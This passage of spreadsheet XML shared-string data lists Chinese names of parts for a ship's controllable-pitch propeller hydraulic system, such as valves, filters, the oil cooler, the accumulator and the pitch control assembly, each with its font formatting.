        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>先导阀线圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>先导阀连接器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>先导阀保护帽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>先导阀滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀线圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀按钮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压阀阀壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹层</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>背压阀安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>背压阀总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>背压阀滑块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰预滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磁预滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰磁预滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气过滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磁杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压滤器元件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤放泄螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气螺钉垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废油盘板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵管接头法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷器法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器端盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器部件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导流板垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷器垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带压力表蓄压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器支板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>桨距控制安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头调整</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>桨距控制单元门盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头机架顶盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作柄垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头叉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头桨距控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导板支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叉形臂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向衬套架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向衬套架适配器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向机构连接环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套定位销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油套总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油套管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毛坯</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀壳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油套管支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标尺安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>量油尺管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>桨距指示器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电位计衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电位计轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>桨距指示器布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入管安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器油管安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油堵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服滑动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
